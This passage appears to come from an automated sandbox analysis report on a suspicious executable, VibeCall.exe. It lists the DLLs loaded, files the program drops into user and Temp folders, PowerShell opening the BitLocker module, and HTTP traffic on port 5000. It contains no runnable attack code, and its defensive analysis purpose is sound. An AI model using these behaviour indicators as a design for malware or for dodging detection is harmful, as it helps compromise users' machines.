                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\aisolution_vibecall_a.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\videosolution_vibecall_b.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\videosolution_vibecall_b.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\VibeCall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: VibeCall.exeStatic PE information: certificate valid
                      Source: VibeCall.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: VibeCall.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: VibeCall.exeStatic file information: File size 71219064 > 1048576
                      Source: VibeCall.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61ac00
                      Source: VibeCall.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17ca00
                      Source: VibeCall.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x172800
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: VibeCall.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wkernel32.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2562039423.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2562167837.0000000003880000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2563032067.0000000003980000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2562816443.0000000003760000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2634358521.00000000036C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2560910656.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2561129278.0000000003950000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2561507677.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2561730228.0000000003900000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2560910656.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2561129278.0000000003950000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2561507677.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2561730228.0000000003900000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1748740065.00007FF7C2A0D000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2563032067.0000000003980000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2562816443.0000000003760000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2634358521.00000000036C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2562039423.0000000003760000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2562167837.0000000003880000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1748961023.00007FF7C2C12000.00000002.00000001.01000000.00000003.sdmp
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: VibeCall.exeStatic PE information: section name: .CLR_UEF
                      Source: VibeCall.exeStatic PE information: section name: .didat
                      Source: VibeCall.exeStatic PE information: section name: Section
                      Source: VibeCall.exeStatic PE information: section name: _RDATA
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: section name: .fptable
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B34D2A5 pushad ; iretd 2_2_00007FFD9B34D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B46C2C5 push ebx; iretd 2_2_00007FFD9B46C2DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B532316 push 8B485F93h; iretd 2_2_00007FFD9B53231B
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_011A19B4 push ecx; ret 15_3_011A19C7
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C8525D push es; ret 15_3_02C85264
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C83FD4 push ss; retf 15_3_02C83FF5
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C83F89 push edi; iretd 15_3_02C83F96
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C80F6A push eax; ret 15_3_02C80F75
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C828EC push edi; ret 15_3_02C828F8
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C810F9 push FFFFFF82h; iretd 15_3_02C810FB
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C844F9 push edx; retf 15_3_02C844FC
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C82C39 push ecx; ret 15_3_02C82C59
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C821DC push eax; ret 15_3_02C821DD
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02C84D5E push esi; ret 15_3_02C84D69
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C828EC push edi; ret 15_2_02C828F8
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C810F9 push FFFFFF82h; iretd 15_2_02C810FB
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C844F9 push edx; retf 15_2_02C844FC
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C8525D push es; ret 15_2_02C85264
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C82C39 push ecx; ret 15_2_02C82C59
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C821DC push eax; ret 15_2_02C821DD
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C83FD4 push ss; retf 15_2_02C83FF5
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C83F89 push edi; iretd 15_2_02C83F96
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C84D5E push esi; ret 15_2_02C84D69
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02C80F6A push eax; ret 15_2_02C80F75
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009E19B4 push ecx; ret 16_3_009E19C7
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00FD10F9 push FFFFFF82h; iretd 16_3_00FD10FB
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00FD44F9 push edx; retf 16_3_00FD44FC
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00FD28EC push edi; ret 16_3_00FD28F8
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00FD2C39 push ecx; ret 16_3_00FD2C59
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00FD21DC push eax; ret 16_3_00FD21DD
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00FD4D5E push esi; ret 16_3_00FD4D69
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\videosolution_vibecall_b.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\videosolution_vibecall_b.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\videosolution_vibecall_b.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49793
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
